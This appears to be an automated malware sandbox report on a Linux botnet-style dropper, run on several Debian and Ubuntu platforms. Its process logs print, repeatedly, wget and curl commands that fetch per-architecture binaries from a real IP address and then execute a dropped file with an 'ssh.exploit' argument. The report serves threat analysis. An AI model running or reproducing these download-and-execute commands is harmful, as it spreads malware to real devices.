Analysis Overview
SHA256
99bd7484ae2c892b3c45d7a60ab1a13495a7ef6a94c2a59240f32ee2faf938ac
Threat Level: Shows suspicious behavior
The file 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 was found to be: Shows suspicious behavior.
Malicious Activity Summary
Executes dropped EXE
Checks CPU configuration
Reads runtime system information
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-28 17:02
Signatures
Analysis: behavioral3
Detonation Overview
Submitted
2024-07-28 17:02
Reported
2024-07-29 10:56
Platform
debian9-mipsbe-20240729-en
Max time kernel
10s
Max time network
9s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/gucci | /tmp/18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 | N/A |
Processes
/tmp/18d2223535e45636ae395a0ff6f871b2_JaffaCakes118
[/tmp/18d2223535e45636ae395a0ff6f871b2_JaffaCakes118]
/usr/bin/wget
[wget http://192.3.122.100/bins/arm]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/arm]
/bin/cat
[cat arm]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-c7d802c3e63a4510b519298769069f5b-systemd-timedated.service-jiMssy]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/arm5]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/arm5]
/bin/cat
[cat arm5]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-c7d802c3e63a4510b519298769069f5b-systemd-timedated.service-jiMssy]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/arm6]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/arm6]
/bin/cat
[cat arm6]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-c7d802c3e63a4510b519298769069f5b-systemd-timedated.service-jiMssy]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/arm7]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/arm7]
/bin/cat
[cat arm7]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-c7d802c3e63a4510b519298769069f5b-systemd-timedated.service-jiMssy]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/m68k]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/m68k]
/bin/cat
[cat m68k]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-c7d802c3e63a4510b519298769069f5b-systemd-timedated.service-jiMssy]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/mips]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/mips]
/bin/cat
[cat mips]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-c7d802c3e63a4510b519298769069f5b-systemd-timedated.service-jiMssy]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/mpsl]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/mpsl]
/bin/cat
[cat mpsl]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-c7d802c3e63a4510b519298769069f5b-systemd-timedated.service-jiMssy]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/ppc]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/ppc]
/bin/cat
[cat ppc]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-c7d802c3e63a4510b519298769069f5b-systemd-timedated.service-jiMssy]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/sh4]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/sh4]
/bin/cat
[cat sh4]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-c7d802c3e63a4510b519298769069f5b-systemd-timedated.service-jiMssy]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/spc]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/spc]
/bin/cat
[cat spc]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-c7d802c3e63a4510b519298769069f5b-systemd-timedated.service-jiMssy]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/x86]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/x86]
/bin/cat
[cat x86]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-c7d802c3e63a4510b519298769069f5b-systemd-timedated.service-jiMssy]
/tmp/gucci
[./gucci ssh.exploit]
Network
| Country | Destination | Domain | Proto |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp |
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-07-28 17:02
Reported
2024-07-29 11:10
Platform
debian9-mipsel-20240729-en
Max time kernel
10s
Max time network
11s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/gucci | /tmp/18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 | N/A |
Processes
/tmp/18d2223535e45636ae395a0ff6f871b2_JaffaCakes118
[/tmp/18d2223535e45636ae395a0ff6f871b2_JaffaCakes118]
/usr/bin/wget
[wget http://192.3.122.100/bins/arm]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/arm]
/bin/cat
[cat arm]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-819d5c3ad7eb4daf80a8012e11071e4a-systemd-timedated.service-FDJJaY]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/arm5]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/arm5]
/bin/cat
[cat arm5]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-819d5c3ad7eb4daf80a8012e11071e4a-systemd-timedated.service-FDJJaY]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/arm6]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/arm6]
/bin/cat
[cat arm6]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-819d5c3ad7eb4daf80a8012e11071e4a-systemd-timedated.service-FDJJaY]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/arm7]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/arm7]
/bin/cat
[cat arm7]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-819d5c3ad7eb4daf80a8012e11071e4a-systemd-timedated.service-FDJJaY]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/m68k]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/m68k]
/bin/cat
[cat m68k]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-819d5c3ad7eb4daf80a8012e11071e4a-systemd-timedated.service-FDJJaY]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/mips]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/mips]
/bin/cat
[cat mips]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-819d5c3ad7eb4daf80a8012e11071e4a-systemd-timedated.service-FDJJaY]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/mpsl]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/mpsl]
/bin/cat
[cat mpsl]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-819d5c3ad7eb4daf80a8012e11071e4a-systemd-timedated.service-FDJJaY]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/ppc]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/ppc]
/bin/cat
[cat ppc]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-819d5c3ad7eb4daf80a8012e11071e4a-systemd-timedated.service-FDJJaY]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/sh4]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/sh4]
/bin/cat
[cat sh4]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-819d5c3ad7eb4daf80a8012e11071e4a-systemd-timedated.service-FDJJaY]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/spc]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/spc]
/bin/cat
[cat spc]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-819d5c3ad7eb4daf80a8012e11071e4a-systemd-timedated.service-FDJJaY]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/x86]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/x86]
/bin/cat
[cat x86]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-819d5c3ad7eb4daf80a8012e11071e4a-systemd-timedated.service-FDJJaY]
/tmp/gucci
[./gucci ssh.exploit]
Network
| Country | Destination | Domain | Proto |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp |
Files
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-28 17:02
Reported
2024-07-29 11:23
Platform
ubuntu1804-amd64-20240729-en
Max time kernel
2s
Max time network
128s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/gucci | /tmp/18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 | N/A |
Processes
/tmp/18d2223535e45636ae395a0ff6f871b2_JaffaCakes118
[/tmp/18d2223535e45636ae395a0ff6f871b2_JaffaCakes118]
/usr/bin/wget
[wget http://192.3.122.100/bins/arm]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/arm]
/bin/cat
[cat arm]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 config-err-Z2iRmj gucci netplan_rmicsxkz snap-private-tmp ssh-fM0WPAM8rKdw systemd-private-20cc4649210b49a4bb7be6d1097bb61c-bolt.service-R4fkcx systemd-private-20cc4649210b49a4bb7be6d1097bb61c-colord.service-VTiSeD systemd-private-20cc4649210b49a4bb7be6d1097bb61c-ModemManager.service-bxgrMV systemd-private-20cc4649210b49a4bb7be6d1097bb61c-systemd-resolved.service-5lDpv9 systemd-private-20cc4649210b49a4bb7be6d1097bb61c-systemd-timedated.service-z09Pm6]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/arm5]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/arm5]
/bin/cat
[cat arm5]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 config-err-Z2iRmj gucci netplan_rmicsxkz snap-private-tmp ssh-fM0WPAM8rKdw systemd-private-20cc4649210b49a4bb7be6d1097bb61c-bolt.service-R4fkcx systemd-private-20cc4649210b49a4bb7be6d1097bb61c-colord.service-VTiSeD systemd-private-20cc4649210b49a4bb7be6d1097bb61c-ModemManager.service-bxgrMV systemd-private-20cc4649210b49a4bb7be6d1097bb61c-systemd-resolved.service-5lDpv9 systemd-private-20cc4649210b49a4bb7be6d1097bb61c-systemd-timedated.service-z09Pm6]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/arm6]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/arm6]
/bin/cat
[cat arm6]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 config-err-Z2iRmj gucci netplan_rmicsxkz snap-private-tmp ssh-fM0WPAM8rKdw systemd-private-20cc4649210b49a4bb7be6d1097bb61c-bolt.service-R4fkcx systemd-private-20cc4649210b49a4bb7be6d1097bb61c-colord.service-VTiSeD systemd-private-20cc4649210b49a4bb7be6d1097bb61c-ModemManager.service-bxgrMV systemd-private-20cc4649210b49a4bb7be6d1097bb61c-systemd-resolved.service-5lDpv9 systemd-private-20cc4649210b49a4bb7be6d1097bb61c-systemd-timedated.service-z09Pm6]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/arm7]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/arm7]
/bin/cat
[cat arm7]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 config-err-Z2iRmj gucci netplan_rmicsxkz snap-private-tmp ssh-fM0WPAM8rKdw systemd-private-20cc4649210b49a4bb7be6d1097bb61c-bolt.service-R4fkcx systemd-private-20cc4649210b49a4bb7be6d1097bb61c-colord.service-VTiSeD systemd-private-20cc4649210b49a4bb7be6d1097bb61c-ModemManager.service-bxgrMV systemd-private-20cc4649210b49a4bb7be6d1097bb61c-systemd-resolved.service-5lDpv9 systemd-private-20cc4649210b49a4bb7be6d1097bb61c-systemd-timedated.service-z09Pm6]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/m68k]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/m68k]
/bin/cat
[cat m68k]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 config-err-Z2iRmj gucci netplan_rmicsxkz snap-private-tmp ssh-fM0WPAM8rKdw systemd-private-20cc4649210b49a4bb7be6d1097bb61c-bolt.service-R4fkcx systemd-private-20cc4649210b49a4bb7be6d1097bb61c-colord.service-VTiSeD systemd-private-20cc4649210b49a4bb7be6d1097bb61c-ModemManager.service-bxgrMV systemd-private-20cc4649210b49a4bb7be6d1097bb61c-systemd-resolved.service-5lDpv9 systemd-private-20cc4649210b49a4bb7be6d1097bb61c-systemd-timedated.service-z09Pm6]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/mips]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/mips]
/bin/cat
[cat mips]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 config-err-Z2iRmj gucci netplan_rmicsxkz snap-private-tmp ssh-fM0WPAM8rKdw systemd-private-20cc4649210b49a4bb7be6d1097bb61c-bolt.service-R4fkcx systemd-private-20cc4649210b49a4bb7be6d1097bb61c-colord.service-VTiSeD systemd-private-20cc4649210b49a4bb7be6d1097bb61c-ModemManager.service-bxgrMV systemd-private-20cc4649210b49a4bb7be6d1097bb61c-systemd-resolved.service-5lDpv9 systemd-private-20cc4649210b49a4bb7be6d1097bb61c-systemd-timedated.service-z09Pm6]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/mpsl]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/mpsl]
/bin/cat
[cat mpsl]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 config-err-Z2iRmj gucci netplan_rmicsxkz snap-private-tmp ssh-fM0WPAM8rKdw systemd-private-20cc4649210b49a4bb7be6d1097bb61c-bolt.service-R4fkcx systemd-private-20cc4649210b49a4bb7be6d1097bb61c-colord.service-VTiSeD systemd-private-20cc4649210b49a4bb7be6d1097bb61c-ModemManager.service-bxgrMV systemd-private-20cc4649210b49a4bb7be6d1097bb61c-systemd-resolved.service-5lDpv9 systemd-private-20cc4649210b49a4bb7be6d1097bb61c-systemd-timedated.service-z09Pm6]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/ppc]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/ppc]
/bin/cat
[cat ppc]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 config-err-Z2iRmj gucci netplan_rmicsxkz snap-private-tmp ssh-fM0WPAM8rKdw systemd-private-20cc4649210b49a4bb7be6d1097bb61c-bolt.service-R4fkcx systemd-private-20cc4649210b49a4bb7be6d1097bb61c-colord.service-VTiSeD systemd-private-20cc4649210b49a4bb7be6d1097bb61c-ModemManager.service-bxgrMV systemd-private-20cc4649210b49a4bb7be6d1097bb61c-systemd-resolved.service-5lDpv9 systemd-private-20cc4649210b49a4bb7be6d1097bb61c-systemd-timedated.service-z09Pm6]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/sh4]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/sh4]
/bin/cat
[cat sh4]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 config-err-Z2iRmj gucci netplan_rmicsxkz snap-private-tmp ssh-fM0WPAM8rKdw systemd-private-20cc4649210b49a4bb7be6d1097bb61c-bolt.service-R4fkcx systemd-private-20cc4649210b49a4bb7be6d1097bb61c-colord.service-VTiSeD systemd-private-20cc4649210b49a4bb7be6d1097bb61c-ModemManager.service-bxgrMV systemd-private-20cc4649210b49a4bb7be6d1097bb61c-systemd-resolved.service-5lDpv9 systemd-private-20cc4649210b49a4bb7be6d1097bb61c-systemd-timedated.service-z09Pm6]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/spc]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/spc]
/bin/cat
[cat spc]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 config-err-Z2iRmj gucci netplan_rmicsxkz snap-private-tmp ssh-fM0WPAM8rKdw systemd-private-20cc4649210b49a4bb7be6d1097bb61c-bolt.service-R4fkcx systemd-private-20cc4649210b49a4bb7be6d1097bb61c-colord.service-VTiSeD systemd-private-20cc4649210b49a4bb7be6d1097bb61c-ModemManager.service-bxgrMV systemd-private-20cc4649210b49a4bb7be6d1097bb61c-systemd-resolved.service-5lDpv9 systemd-private-20cc4649210b49a4bb7be6d1097bb61c-systemd-timedated.service-z09Pm6]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/x86]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/x86]
/bin/cat
[cat x86]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 config-err-Z2iRmj gucci netplan_rmicsxkz snap-private-tmp ssh-fM0WPAM8rKdw systemd-private-20cc4649210b49a4bb7be6d1097bb61c-bolt.service-R4fkcx systemd-private-20cc4649210b49a4bb7be6d1097bb61c-colord.service-VTiSeD systemd-private-20cc4649210b49a4bb7be6d1097bb61c-ModemManager.service-bxgrMV systemd-private-20cc4649210b49a4bb7be6d1097bb61c-systemd-resolved.service-5lDpv9 systemd-private-20cc4649210b49a4bb7be6d1097bb61c-systemd-timedated.service-z09Pm6]
/tmp/gucci
[./gucci ssh.exploit]
Network
| Country | Destination | Domain | Proto |
| US | 192.3.122.100:80 | tcp | |
| N/A | 224.0.0.251:5353 | udp | |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| GB | 185.125.188.61:443 | tcp | |
| GB | 185.125.188.62:443 | tcp | |
| US | 151.101.65.91:443 | tcp | |
| US | 151.101.65.91:443 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| GB | 84.17.50.9:443 | tcp | |
| US | 192.3.122.100:80 | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-07-28 17:02
Reported
2024-07-29 10:38
Platform
debian9-armhf-20240729-en
Max time kernel
20s
Max time network
21s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
| N/A | /tmp/gucci | /tmp/gucci | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
